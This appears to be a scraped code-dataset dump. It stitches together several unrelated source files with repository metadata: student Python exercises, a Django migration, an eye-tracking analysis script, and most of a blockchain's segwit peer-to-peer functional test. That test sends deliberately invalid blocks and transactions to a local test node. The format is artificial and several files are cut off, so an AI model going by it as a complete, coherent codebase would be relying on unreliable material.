if __name__ == "__main__":
play = PlayHumanvsCom()
| [
"noreply@github.com"
] | noreply@github.com |
6f310fb4021e58a16a26e9b61fa33bb68a69b23b | e1091df0ce19a786924ac176a8a7ad158c0ff898 | /datascrape/wk5XMLassignment.py | bd69745590b800a81e49d2c0432a475f8f73d808 | [] | no_license | tanupat92/learnComsci | 4c9a8201f07da80e92eb6f6ad54b3d461926f18a | de1cbe5ac63cf46fc3b953011eb4582f31f01871 | refs/heads/master | 2021-12-14T02:13:16.219495 | 2021-12-11T05:10:25 | 2021-12-11T05:10:25 | 235,941,597 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Feb 15 12:03:21 2020
@author: tanupatsurface
"""
#http://py4e-data.dr-chuck.net/comments_372615.xml
import urllib.request, urllib.parse, urllib.error
import xml.etree.ElementTree as ET
url = input('Enter location: ')
data = urllib.request.urlopen(url).read()
tree = ET.fromstring(data)
lst = tree.findall('comments/comment')
total = 0
for a in lst:
total = total + int(a.find('count').text)
print('Count:', len(lst))
print('Sum:', total) | [
"tanupat92@gmail.com"
] | tanupat92@gmail.com |
93a32431b1829ea2c4c0c45bf3d687cd85aa98b1 | de470351e95007d24430955b68431c55319488a3 | /Old/behav_gaze_df_transinf.py | a4dfaf13098f6db5ddef525cdec5ad04552d7fc6 | [] | no_license | marthabawn/EyeTracking | 31ea2cfa94913636c82fd76ddacc12deb2690787 | d96a53e1c53dcf81be9d14070deada889000c2eb | refs/heads/master | 2021-01-23T11:54:34.238569 | 2015-06-05T00:32:29 | 2015-06-05T00:32:29 | 30,372,988 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,857 | py | import numpy as np
import pandas as pd
import glob
import os
dict_practice = {1: 'IneqEq0', 2: 'IneqEq0'}
#You need to text files that have a list of the conditions each trial corresponds to
dict_setA = {}
with open("Dictionaries/trans_setA_list.txt", 'r') as setA_list:
for line in setA_list:
(key, val) = line.split()
dict_setA[int (key)] = val
setA_list.close()
dict_setB = {}
with open("Dictionaries/trans_setB_list.txt", 'r') as setB_list:
for line in setB_list:
(key, val) = line.split()
dict_setB[int (key)] = val
setB_list.close()
def map_trial_to_condition(row):
if row[2] == 'practice':
if row[3] in dict_practice:
return dict_practice[row[3]]
elif row[2] == 'setA':
if row[3] in dict_setA:
return dict_setA[row[3]]
elif row[2] == 'setB':
if row[3] in dict_setB:
return dict_setB[row[3]]
return 'N/A'
### Create dataframe pd from behavioral data
df = pd.DataFrame()
#Reads all the _behavioral files in the folder specified
for f in glob.glob("TransInf_Behav_Data/*behavioralout.txt"):
filename = os.path.basename(f)
filename_parts = filename.split('_')
if filename_parts[2] == 'practice':
subject = filename_parts[0][:5]+filename_parts[2]
else:
subject = filename_parts[0][:5] + filename_parts[2][-1]
block = filename_parts[2]
group = filename_parts[0][:2]
print "processing subject:", subject #, block
with open(f, 'r') as csvfile:
dfTemp = pd.read_csv(csvfile, delimiter='\t', header=None, names=['Trial', 'Infer', 'CorrectAnswer',
'SubjectResponse', 'ProbRel', 'RT', 'RT_Unc'])
if len(dfTemp) == 0:
continue
dfTemp.insert(0, 'PID', subject)
dfTemp.insert(1, 'Group', group)
dfTemp.insert(2, 'Block', block)
dfTemp['Accuracy'] = np.where(dfTemp['CorrectAnswer'] == dfTemp['SubjectResponse'], 1, 0)
dfNewCol = dfTemp.apply(map_trial_to_condition, axis=1)
dfTemp.insert(3, 'Condition', dfNewCol)
df = df.append(dfTemp, ignore_index=True)
df = df.sort(['PID', 'Trial'])
df = df.reset_index()
df = df.drop('index', axis=1)
### Create dataframe gaze_stats from gaze data
gaze_stats = pd.read_csv('Gaze_Stats/LSAT_T1transinf_gaze_statistics1-16.txt', delimiter='\t', header=None)
gaze_stats.columns = ['PID', 'Comments', 'Trial', 'ConditionNumber','Duration','Fix/SaccadeRatio','TimeToTarget',
'FixationsInTarget', 'TotalFixTimeInTarget','TimeToNontarget', 'FixationsInNontarget',
'TotalFixTimeInNontarget', 'TimeToQuestion', 'FixationsInQuestion','TotalFixTimeInQuestion','extra']
gaze_stats = gaze_stats.dropna(how='all') # Ogama adds an empty column and row to the end
gaze_stats = gaze_stats.dropna(axis=1,how='all')
gaze_stats = gaze_stats.drop(gaze_stats.index[0]) # these are the Ogama labels, which are really long
gaze_stats = gaze_stats.reset_index()
gaze_stats['Trial'] = gaze_stats['Trial'].astype(int)
### Create dataframe new_df with all data
new_df = df.merge(gaze_stats, how='outer', sort=False)
column_order = ['PID', 'Comments', 'Block', 'Trial', 'Condition', 'Infer', 'CorrectAnswer', 'SubjectResponse',
'Accuracy', 'ProbRel', 'RT', 'RT_Unc', 'Duration', 'Fix/SaccadeRatio', 'TimeToTarget',
'FixationsInTarget', 'TotalFixTimeInTarget', 'TimeToNontarget', 'FixationsInNontarget',
'TotalFixTimeInNontarget', 'TimeToQuestion', 'FixationsInQuestion', 'TotalFixTimeInQuestion']
new_df = new_df[column_order]
#remove block name from PID
for i in range(len(new_df['PID'])):
new_df['PID'][i] = new_df['PID'][i][0:5]
#allow for different sequence for rt101
rt101_conditions = ['IneqEq2', 'IneqEq1', 'IneqIneq1', 'IneqEq2', 'IneqIneq1', 'IneqIneq2', 'IneqIneq0', 'IneqIneq1',
'IneqIneq0', 'IneqEq0', 'IneqEq1', 'IneqEq0', 'IneqIneq0', 'IneqEq2', 'IneqEq2', 'IneqIneq2',
'IneqEq2', 'IneqIneq0', 'IneqIneq0', 'IneqIneq2', 'IneqIneq2', 'IneqEq1', 'IneqIneq1', 'IneqEq0',
'IneqEq0', 'IneqIneq2', 'IneqEq0', 'IneqEq0', 'IneqIneq0', 'IneqIneq2', 'IneqEq2', 'IneqEq2',
'IneqIneq1', 'IneqEq1', 'IneqEq1', 'IneqIneq2', 'IneqEq1', 'IneqIneq1', 'IneqEq2', 'IneqIneq2',
'IneqEq1', 'IneqIneq1', 'IneqEq2', 'IneqIneq0', 'IneqEq0', 'IneqIneq2', 'IneqEq1', 'IneqIneq0',
'IneqIneq2', 'IneqEq1', 'IneqIneq1', 'IneqEq2', 'IneqEq1', 'IneqEq0', 'IneqEq0', 'IneqIneq1',
'IneqIneq0', 'IneqIneq0', 'IneqEq0', 'IneqIneq1']
if new_df['PID'][0] == 'rt101':
new_df['Condition'][0:60] = rt101_conditions
new_df.to_csv('All_Stats/LSAT_T1transinf_behavioral_gaze_statistics1-16.csv')
| [
"martha.bawn@berkeley.edu"
] | martha.bawn@berkeley.edu |
646d95c185fca0a27dada15c7b6529fcfe5624e7 | 96cdc5b05fdcd534f7c50051d87f07e7d5d3eeca | /treehouse/dashboard/migrations/0001_initial.py | b5a291cd85bc7da06785556e1b50331cfec90bb9 | [] | no_license | zhm12359/fam_tree | ca8cde69b9f0329a07f01d7a5428b300ff63ed7f | d532ae715ebaa338dd9d04b3844772867a1a6339 | refs/heads/master | 2022-12-28T11:55:25.954308 | 2020-06-05T18:20:31 | 2020-06-05T18:20:31 | 116,883,868 | 0 | 0 | null | 2022-05-25T00:25:38 | 2018-01-09T23:45:26 | Python | UTF-8 | Python | false | false | 809 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-01-14 03:02
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('big', models.CharField(max_length=200)),
('assistant_big', models.CharField(max_length=200)),
('big_2', models.CharField(max_length=200)),
('assistant_big_2', models.CharField(max_length=200)),
],
),
]
| [
"hz926@nyu.edu"
] | hz926@nyu.edu |
4ae8db22431c5e07ecd077901741065e803ae3f1 | 96f3bfdc79d64869a627f52edbbb227cb5bc10b8 | /venv/bin/pip | f6be3a7cd28627775c3f09ea0fa180298e94e2e7 | [] | no_license | jwndhonoferry/testPySpark | 9330c911502c7dd5edcf124bf2391ec8811f2895 | 0f696595effc6a6bfdf4d38720a0a297d407bd10 | refs/heads/master | 2023-03-23T07:17:24.900233 | 2021-03-17T09:12:15 | 2021-03-17T09:12:15 | 331,209,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | #!/home/jwndhono/PycharmProjects/testPySpark/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"ferryjwndhono@gmail.com"
] | ferryjwndhono@gmail.com | |
8da30b113987bded98b34ce10e865f20b739abae | 771ee6b116368503106729025c72c333aa5752e3 | /shopys/apps/catalog/migrations/0001_initial.py | 5876ebef2b4c2ed65c82bda6d309467ce9b1bd66 | [] | no_license | zhaolikuns/shopsys | 732e501806e33c0922d913c3255fd1bb4bfbfa32 | ec8d2490d5b0b32b172040358532d06b6fddc6c7 | refs/heads/master | 2021-03-16T05:07:09.014705 | 2017-05-21T13:04:00 | 2017-05-21T13:04:00 | 91,534,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,831 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-05-18 05:54
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, verbose_name='产品类型')),
('slug', models.SlugField(help_text='根据name生成的,用于生成界面url,必须唯一', unique=True, verbose_name='Slug')),
('description', models.TextField(verbose_name='描述')),
('is_active', models.BooleanField(default=True, verbose_name='是否激活')),
('meta_keywords', models.CharField(help_text='关键字输入区域', max_length=255, verbose_name='meta 关键字')),
('meta_description', models.CharField(help_text='关键字输入区域', max_length=255, verbose_name='meta 关键字')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
],
options={
'db_table': 'categories',
'verbose_name_plural': '产品类型',
'ordering': ['-create_time'],
'verbose_name': '产品类型',
},
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, unique=True, verbose_name='产品名称')),
('slug', models.SlugField(help_text='根据name生成的,用于生成界面url,必须唯一', max_length=255, unique=True, verbose_name='Slug')),
('brand', models.CharField(max_length=50, verbose_name='品牌')),
('sku', models.CharField(max_length=50, verbose_name='计量单位')),
('price', models.DecimalField(decimal_places=2, max_digits=9, verbose_name='价格')),
('old_price', models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=9, verbose_name='旧价格')),
('image', models.ImageField(max_length=50, upload_to='', verbose_name='图片')),
('is_active', models.BooleanField(default=True, verbose_name='设为激活')),
('is_bestseller', models.BooleanField(default=False, verbose_name='标为畅销')),
('is_featured', models.BooleanField(default=False, verbose_name='标为推荐')),
('quantity', models.IntegerField(default=1, verbose_name='数量')),
('description', models.TextField(verbose_name='描述')),
('meta_keywords', models.CharField(help_text='关键字输入区域', max_length=255, verbose_name='Meta 关键词')),
('meta_description', models.CharField(help_text='关键字输入区域', max_length=255, verbose_name='meta 关键字')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
('categories', models.ManyToManyField(to='catalog.Category')),
],
options={
'db_table': 'products',
'verbose_name_plural': '产品名称',
'ordering': ['-create_time'],
'verbose_name': '产品名称',
},
),
]
| [
"355149444@qq.com"
] | 355149444@qq.com |
3691083811d7321c87cdbb05e8c670f027fec3f9 | 5167f77d96d1dc5412a8a0a91c95e3086acd05dc | /test/functional/p2p_segwit.py | ceccca331b56c3e9dca0b314718090ac21ff9ef9 | [
"MIT"
] | permissive | ocvcoin/ocvcoin | 04fb0cea7c11bf52e07ea06ddf9df89631eced5f | 79c3803e330f32ed50c02ae657ff9aded6297b9d | refs/heads/master | 2023-04-30T10:42:05.457630 | 2023-04-15T11:49:40 | 2023-04-15T11:49:40 | 406,011,904 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 100,563 | py | #!/usr/bin/env python3
# Copyright (c) 2016-2020 The Ocvcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test segwit transactions and blocks on P2P network."""
from decimal import Decimal
import math
import random
import struct
import time
from test_framework.blocktools import create_block, create_coinbase, add_witness_commitment, get_witness_script, WITNESS_COMMITMENT_HEADER
from test_framework.key import ECKey
from test_framework.messages import (
BIP125_SEQUENCE_NUMBER,
CBlock,
CBlockHeader,
CInv,
COutPoint,
CTransaction,
CTxIn,
CTxInWitness,
CTxOut,
CTxWitness,
MAX_BLOCK_BASE_SIZE,
MSG_BLOCK,
MSG_TX,
MSG_WITNESS_FLAG,
MSG_WITNESS_TX,
MSG_WTX,
NODE_NETWORK,
NODE_WITNESS,
msg_no_witness_block,
msg_getdata,
msg_headers,
msg_inv,
msg_tx,
msg_block,
msg_no_witness_tx,
ser_uint256,
ser_vector,
sha256,
tx_from_hex,
)
from test_framework.p2p import (
P2PInterface,
p2p_lock,
)
from test_framework.script import (
CScript,
CScriptNum,
CScriptOp,
MAX_SCRIPT_ELEMENT_SIZE,
OP_0,
OP_1,
OP_2,
OP_16,
OP_2DROP,
OP_CHECKMULTISIG,
OP_CHECKSIG,
OP_DROP,
OP_ELSE,
OP_ENDIF,
OP_IF,
OP_RETURN,
OP_TRUE,
SIGHASH_ALL,
SIGHASH_ANYONECANPAY,
SIGHASH_NONE,
SIGHASH_SINGLE,
SegwitV0SignatureHash,
LegacySignatureHash,
hash160,
)
from test_framework.script_util import (
key_to_p2wpkh_script,
keyhash_to_p2pkh_script,
script_to_p2sh_script,
script_to_p2wsh_script,
)
from test_framework.test_framework import OcvcoinTestFramework
from test_framework.util import (
assert_equal,
softfork_active,
hex_str_to_bytes,
assert_raises_rpc_error,
)
# The versionbit bit used to signal activation of SegWit
VB_WITNESS_BIT = 1
VB_TOP_BITS = 0x20000000
MAX_SIGOP_COST = 80000
SEGWIT_HEIGHT = 120
class UTXO():
"""Used to keep track of anyone-can-spend outputs that we can use in the tests."""
def __init__(self, sha256, n, value):
self.sha256 = sha256
self.n = n
self.nValue = value
def sign_p2pk_witness_input(script, tx_to, in_idx, hashtype, value, key):
"""Add signature for a P2PK witness program."""
tx_hash = SegwitV0SignatureHash(script, tx_to, in_idx, hashtype, value)
signature = key.sign_ecdsa(tx_hash) + chr(hashtype).encode('latin-1')
tx_to.wit.vtxinwit[in_idx].scriptWitness.stack = [signature, script]
tx_to.rehash()
def get_virtual_size(witness_block):
"""Calculate the virtual size of a witness block.
Virtual size is base + witness/4."""
base_size = len(witness_block.serialize(with_witness=False))
total_size = len(witness_block.serialize())
# the "+3" is so we round up
vsize = int((3 * base_size + total_size + 3) / 4)
return vsize
def test_transaction_acceptance(node, p2p, tx, with_witness, accepted, reason=None):
"""Send a transaction to the node and check that it's accepted to the mempool
- Submit the transaction over the p2p interface
- use the getrawmempool rpc to check for acceptance."""
reason = [reason] if reason else []
with node.assert_debug_log(expected_msgs=reason):
p2p.send_and_ping(msg_tx(tx) if with_witness else msg_no_witness_tx(tx))
assert_equal(tx.hash in node.getrawmempool(), accepted)
def test_witness_block(node, p2p, block, accepted, with_witness=True, reason=None):
"""Send a block to the node and check that it's accepted
- Submit the block over the p2p interface
- use the getbestblockhash rpc to check for acceptance."""
reason = [reason] if reason else []
with node.assert_debug_log(expected_msgs=reason):
p2p.send_and_ping(msg_block(block) if with_witness else msg_no_witness_block(block))
assert_equal(node.getbestblockhash() == block.hash, accepted)
class TestP2PConn(P2PInterface):
def __init__(self, wtxidrelay=False):
super().__init__(wtxidrelay=wtxidrelay)
self.getdataset = set()
self.last_wtxidrelay = []
self.lastgetdata = []
self.wtxidrelay = wtxidrelay
# Don't send getdata message replies to invs automatically.
# We'll send the getdata messages explicitly in the test logic.
def on_inv(self, message):
pass
def on_getdata(self, message):
self.lastgetdata = message.inv
for inv in message.inv:
self.getdataset.add(inv.hash)
def on_wtxidrelay(self, message):
self.last_wtxidrelay.append(message)
def announce_tx_and_wait_for_getdata(self, tx, success=True, use_wtxid=False):
if success:
# sanity check
assert (self.wtxidrelay and use_wtxid) or (not self.wtxidrelay and not use_wtxid)
with p2p_lock:
self.last_message.pop("getdata", None)
if use_wtxid:
wtxid = tx.calc_sha256(True)
self.send_message(msg_inv(inv=[CInv(MSG_WTX, wtxid)]))
else:
self.send_message(msg_inv(inv=[CInv(MSG_TX, tx.sha256)]))
if success:
if use_wtxid:
self.wait_for_getdata([wtxid])
else:
self.wait_for_getdata([tx.sha256])
else:
time.sleep(5)
assert not self.last_message.get("getdata")
def announce_block_and_wait_for_getdata(self, block, use_header, timeout=60):
with p2p_lock:
self.last_message.pop("getdata", None)
self.last_message.pop("getheaders", None)
msg = msg_headers()
msg.headers = [CBlockHeader(block)]
if use_header:
self.send_message(msg)
else:
self.send_message(msg_inv(inv=[CInv(MSG_BLOCK, block.sha256)]))
self.wait_for_getheaders()
self.send_message(msg)
self.wait_for_getdata([block.sha256])
def request_block(self, blockhash, inv_type, timeout=60):
with p2p_lock:
self.last_message.pop("block", None)
self.send_message(msg_getdata(inv=[CInv(inv_type, blockhash)]))
self.wait_for_block(blockhash, timeout)
return self.last_message["block"].block
class SegWitTest(OcvcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
# This test tests SegWit both pre and post-activation, so use the normal BIP9 activation.
self.extra_args = [
["-acceptnonstdtxn=1", "-segwitheight={}".format(SEGWIT_HEIGHT), "-whitelist=noban@127.0.0.1"],
["-acceptnonstdtxn=0", "-segwitheight={}".format(SEGWIT_HEIGHT)],
["-acceptnonstdtxn=1", "-segwitheight=-1"],
]
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
self.setup_nodes()
self.connect_nodes(0, 1)
self.connect_nodes(0, 2)
self.sync_all()
# Helper functions
def build_next_block(self, version=4):
"""Build a block on top of node0's tip."""
tip = self.nodes[0].getbestblockhash()
height = self.nodes[0].getblockcount() + 1
block_time = self.nodes[0].getblockheader(tip)["mediantime"] + 1
block = create_block(int(tip, 16), create_coinbase(height), block_time)
block.nVersion = version
block.rehash()
return block
def update_witness_block_with_transactions(self, block, tx_list, nonce=0):
"""Add list of transactions to block, adds witness commitment, then solves."""
block.vtx.extend(tx_list)
add_witness_commitment(block, nonce)
block.solve()
def run_test(self):
# Setup the p2p connections
# self.test_node sets NODE_WITNESS|NODE_NETWORK
self.test_node = self.nodes[0].add_p2p_connection(TestP2PConn(), services=NODE_NETWORK | NODE_WITNESS)
# self.old_node sets only NODE_NETWORK
self.old_node = self.nodes[0].add_p2p_connection(TestP2PConn(), services=NODE_NETWORK)
# self.std_node is for testing node1 (fRequireStandard=true)
self.std_node = self.nodes[1].add_p2p_connection(TestP2PConn(), services=NODE_NETWORK | NODE_WITNESS)
# self.std_wtx_node is for testing node1 with wtxid relay
self.std_wtx_node = self.nodes[1].add_p2p_connection(TestP2PConn(wtxidrelay=True), services=NODE_NETWORK | NODE_WITNESS)
assert self.test_node.nServices & NODE_WITNESS != 0
# Keep a place to store utxo's that can be used in later tests
self.utxo = []
self.log.info("Starting tests before segwit activation")
self.segwit_active = False
self.test_non_witness_transaction()
self.test_v0_outputs_arent_spendable()
self.test_block_relay()
self.test_getblocktemplate_before_lockin()
self.test_unnecessary_witness_before_segwit_activation()
self.test_witness_tx_relay_before_segwit_activation()
self.test_standardness_v0()
self.log.info("Advancing to segwit activation")
self.advance_to_segwit_active()
# Segwit status 'active'
self.test_p2sh_witness()
self.test_witness_commitments()
self.test_block_malleability()
self.test_witness_block_size()
self.test_submit_block()
self.test_extra_witness_data()
self.test_max_witness_push_length()
self.test_max_witness_program_length()
self.test_witness_input_length()
self.test_block_relay()
self.test_tx_relay_after_segwit_activation()
self.test_standardness_v0()
self.test_segwit_versions()
self.test_premature_coinbase_witness_spend()
self.test_uncompressed_pubkey()
self.test_signature_version_1()
self.test_non_standard_witness_blinding()
self.test_non_standard_witness()
self.test_upgrade_after_activation()
self.test_witness_sigops()
self.test_superfluous_witness()
self.test_wtxid_relay()
# Individual tests
def subtest(func): # noqa: N805
"""Wraps the subtests for logging and state assertions."""
def func_wrapper(self, *args, **kwargs):
self.log.info("Subtest: {} (Segwit active = {})".format(func.__name__, self.segwit_active))
# Assert segwit status is as expected
assert_equal(softfork_active(self.nodes[0], 'segwit'), self.segwit_active)
func(self, *args, **kwargs)
# Each subtest should leave some utxos for the next subtest
assert self.utxo
self.sync_blocks()
# Assert segwit status is as expected at end of subtest
assert_equal(softfork_active(self.nodes[0], 'segwit'), self.segwit_active)
return func_wrapper
@subtest # type: ignore
def test_non_witness_transaction(self):
"""See if sending a regular transaction works, and create a utxo to use in later tests."""
# Mine a block with an anyone-can-spend coinbase,
# let it mature, then try to spend it.
block = self.build_next_block(version=1)
block.solve()
self.test_node.send_and_ping(msg_no_witness_block(block)) # make sure the block was processed
txid = block.vtx[0].sha256
self.nodes[0].generate(99) # let the block mature
# Create a transaction that spends the coinbase
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(txid, 0), b""))
tx.vout.append(CTxOut(49 * 100000000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx.calc_sha256()
# Check that serializing it with or without witness is the same
# This is a sanity check of our testing framework.
assert_equal(msg_no_witness_tx(tx).serialize(), msg_tx(tx).serialize())
self.test_node.send_and_ping(msg_tx(tx)) # make sure the block was processed
assert tx.hash in self.nodes[0].getrawmempool()
# Save this transaction for later
self.utxo.append(UTXO(tx.sha256, 0, 49 * 100000000))
self.nodes[0].generate(1)
@subtest # type: ignore
def test_unnecessary_witness_before_segwit_activation(self):
"""Verify that blocks with witnesses are rejected before activation."""
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, CScript([OP_TRUE])))
tx.wit.vtxinwit.append(CTxInWitness())
tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([CScriptNum(1)])]
# Verify the hash with witness differs from the txid
# (otherwise our testing framework must be broken!)
tx.rehash()
assert tx.sha256 != tx.calc_sha256(with_witness=True)
# Construct a segwit-signaling block that includes the transaction.
block = self.build_next_block(version=(VB_TOP_BITS | (1 << VB_WITNESS_BIT)))
self.update_witness_block_with_transactions(block, [tx])
# Sending witness data before activation is not allowed (anti-spam
# rule).
test_witness_block(self.nodes[0], self.test_node, block, accepted=False, reason='unexpected-witness')
# But it should not be permanently marked bad...
# Resend without witness information.
self.test_node.send_and_ping(msg_no_witness_block(block)) # make sure the block was processed
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
# Update our utxo list; we spent the first entry.
self.utxo.pop(0)
self.utxo.append(UTXO(tx.sha256, 0, tx.vout[0].nValue))
@subtest # type: ignore
def test_block_relay(self):
"""Test that block requests to NODE_WITNESS peer are with MSG_WITNESS_FLAG.
This is true regardless of segwit activation.
Also test that we don't ask for blocks from unupgraded peers."""
blocktype = 2 | MSG_WITNESS_FLAG
# test_node has set NODE_WITNESS, so all getdata requests should be for
# witness blocks.
# Test announcing a block via inv results in a getdata, and that
# announcing a version 4 or random VB block with a header results in a getdata
block1 = self.build_next_block()
block1.solve()
self.test_node.announce_block_and_wait_for_getdata(block1, use_header=False)
assert self.test_node.last_message["getdata"].inv[0].type == blocktype
test_witness_block(self.nodes[0], self.test_node, block1, True)
block2 = self.build_next_block(version=4)
block2.solve()
self.test_node.announce_block_and_wait_for_getdata(block2, use_header=True)
assert self.test_node.last_message["getdata"].inv[0].type == blocktype
test_witness_block(self.nodes[0], self.test_node, block2, True)
block3 = self.build_next_block(version=(VB_TOP_BITS | (1 << 15)))
block3.solve()
self.test_node.announce_block_and_wait_for_getdata(block3, use_header=True)
assert self.test_node.last_message["getdata"].inv[0].type == blocktype
test_witness_block(self.nodes[0], self.test_node, block3, True)
# Check that we can getdata for witness blocks or regular blocks,
# and the right thing happens.
if not self.segwit_active:
# Before activation, we should be able to request old blocks with
# or without witness, and they should be the same.
chain_height = self.nodes[0].getblockcount()
# Pick 10 random blocks on main chain, and verify that getdata's
# for MSG_BLOCK, MSG_WITNESS_BLOCK, and rpc getblock() are equal.
all_heights = list(range(chain_height + 1))
random.shuffle(all_heights)
all_heights = all_heights[0:10]
for height in all_heights:
block_hash = self.nodes[0].getblockhash(height)
rpc_block = self.nodes[0].getblock(block_hash, False)
block_hash = int(block_hash, 16)
block = self.test_node.request_block(block_hash, 2)
wit_block = self.test_node.request_block(block_hash, 2 | MSG_WITNESS_FLAG)
assert_equal(block.serialize(), wit_block.serialize())
assert_equal(block.serialize(), hex_str_to_bytes(rpc_block))
else:
# After activation, witness blocks and non-witness blocks should
# be different. Verify rpc getblock() returns witness blocks, while
# getdata respects the requested type.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [])
# This gives us a witness commitment.
assert len(block.vtx[0].wit.vtxinwit) == 1
assert len(block.vtx[0].wit.vtxinwit[0].scriptWitness.stack) == 1
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Now try to retrieve it...
rpc_block = self.nodes[0].getblock(block.hash, False)
non_wit_block = self.test_node.request_block(block.sha256, 2)
wit_block = self.test_node.request_block(block.sha256, 2 | MSG_WITNESS_FLAG)
assert_equal(wit_block.serialize(), hex_str_to_bytes(rpc_block))
assert_equal(wit_block.serialize(False), non_wit_block.serialize())
assert_equal(wit_block.serialize(), block.serialize())
# Test size, vsize, weight
rpc_details = self.nodes[0].getblock(block.hash, True)
assert_equal(rpc_details["size"], len(block.serialize()))
assert_equal(rpc_details["strippedsize"], len(block.serialize(False)))
weight = 3 * len(block.serialize(False)) + len(block.serialize())
assert_equal(rpc_details["weight"], weight)
# Upgraded node should not ask for blocks from unupgraded
block4 = self.build_next_block(version=4)
block4.solve()
self.old_node.getdataset = set()
# Blocks can be requested via direct-fetch (immediately upon processing the announcement)
# or via parallel download (with an indeterminate delay from processing the announcement)
# so to test that a block is NOT requested, we could guess a time period to sleep for,
# and then check. We can avoid the sleep() by taking advantage of transaction getdata's
# being processed after block getdata's, and announce a transaction as well,
# and then check to see if that particular getdata has been received.
# Since 0.14, inv's will only be responded to with a getheaders, so send a header
# to announce this block.
msg = msg_headers()
msg.headers = [CBlockHeader(block4)]
self.old_node.send_message(msg)
self.old_node.announce_tx_and_wait_for_getdata(block4.vtx[0])
assert block4.sha256 not in self.old_node.getdataset
@subtest # type: ignore
def test_v0_outputs_arent_spendable(self):
"""Test that v0 outputs aren't spendable before segwit activation.
~6 months after segwit activation, the SCRIPT_VERIFY_WITNESS flag was
backdated so that it applies to all blocks, going back to the genesis
block.
Consequently, version 0 witness outputs are never spendable without
witness, and so can't be spent before segwit activation (the point at which
blocks are permitted to contain witnesses)."""
# node2 doesn't need to be connected for this test.
# (If it's connected, node0 may propagate an invalid block to it over
# compact blocks and the nodes would have inconsistent tips.)
self.disconnect_nodes(0, 2)
# Create two outputs, a p2wsh and p2sh-p2wsh
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
p2sh_script_pubkey = script_to_p2sh_script(script_pubkey)
value = self.utxo[0].nValue // 3
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b'')]
tx.vout = [CTxOut(value, script_pubkey), CTxOut(value, p2sh_script_pubkey)]
tx.vout.append(CTxOut(value, CScript([OP_TRUE])))
tx.rehash()
txid = tx.sha256
# Add it to a block
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
# Verify that segwit isn't activated. A block serialized with witness
# should be rejected prior to activation.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False, with_witness=True, reason='unexpected-witness')
# Now send the block without witness. It should be accepted
test_witness_block(self.nodes[0], self.test_node, block, accepted=True, with_witness=False)
# Now try to spend the outputs. This should fail since SCRIPT_VERIFY_WITNESS is always enabled.
p2wsh_tx = CTransaction()
p2wsh_tx.vin = [CTxIn(COutPoint(txid, 0), b'')]
p2wsh_tx.vout = [CTxOut(value, CScript([OP_TRUE]))]
p2wsh_tx.wit.vtxinwit.append(CTxInWitness())
p2wsh_tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([OP_TRUE])]
p2wsh_tx.rehash()
p2sh_p2wsh_tx = CTransaction()
p2sh_p2wsh_tx.vin = [CTxIn(COutPoint(txid, 1), CScript([script_pubkey]))]
p2sh_p2wsh_tx.vout = [CTxOut(value, CScript([OP_TRUE]))]
p2sh_p2wsh_tx.wit.vtxinwit.append(CTxInWitness())
p2sh_p2wsh_tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([OP_TRUE])]
p2sh_p2wsh_tx.rehash()
for tx in [p2wsh_tx, p2sh_p2wsh_tx]:
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
# When the block is serialized with a witness, the block will be rejected because witness
# data isn't allowed in blocks that don't commit to witness data.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False, with_witness=True, reason='unexpected-witness')
# When the block is serialized without witness, validation fails because the transaction is
# invalid (transactions are always validated with SCRIPT_VERIFY_WITNESS so a segwit v0 transaction
# without a witness is invalid).
# Note: The reject reason for this failure could be
# 'block-validation-failed' (if script check threads > 1) or
# 'non-mandatory-script-verify-flag (Witness program was passed an
# empty witness)' (otherwise).
# TODO: support multiple acceptable reject reasons.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False, with_witness=False)
